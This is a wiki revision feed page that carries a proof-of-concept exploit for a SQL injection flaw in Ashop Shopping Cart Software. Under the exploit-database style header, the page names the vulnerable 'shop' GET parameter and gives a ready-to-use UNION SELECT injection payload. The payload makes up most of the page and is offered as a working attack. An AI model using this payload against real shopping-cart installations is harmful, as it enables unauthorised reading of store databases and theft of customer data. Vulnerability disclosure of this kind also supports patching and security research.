https://pwnwiki.com/index.php?action=history&feed=atom&title=Ashop_Shopping_Cart_Software_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E Ashop Shopping Cart Software SQL注入漏洞 - Revision history 2026-04-09T04:36:29Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Ashop_Shopping_Cart_Software_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=2021&oldid=prev Pwnwiki: Created page with "==POC== <pre> # Exploit Title: Ashop Shopping Cart Software - SQL Injection # Date: 03.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: http://www.ashopsoftware..." 2021-05-02T04:41:41Z <p>Created page with &quot;==POC== &lt;pre&gt; # Exploit Title: Ashop Shopping Cart Software - SQL Injection # Date: 03.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: http://www.ashopsoftware...&quot;</p> <p><b>New page</b></p><div>==POC==<br /> &lt;pre&gt;<br /> # Exploit Title: Ashop Shopping Cart Software - SQL Injection<br /> # Date: 03.03.2019<br /> # Exploit Author: Ahmet Ümit BAYRAM<br /> # Vendor Homepage: http://www.ashopsoftware.com<br /> # Software Link: https://sourceforge.net/projects/ashop/<br /> # Demo Site: http://demo.ashopsoftware.com/<br /> # Version: Lastest<br /> # Tested on: Kali Linux<br /> # CVE: N/A<br /> <br /> ----- PoC: SQLi -----<br /> <br /> Request: http://localhost/[PATH]/index.php?cat=1&amp;exp=&amp;shop=1<br /> Vulnerable Parameter: shop (GET)<br /> Payload: cat=1&amp;exp=&amp;shop=-5438') UNION ALL SELECT<br /> CONCAT(0x71786b6a71,0x6357557777645143654a726369774c4167665278634a46617758614d66506b46434f4b7669565054,0x716a787671),NULL--<br /> fmIb<br /> <br /> &lt;/pre&gt;</div> Pwnwiki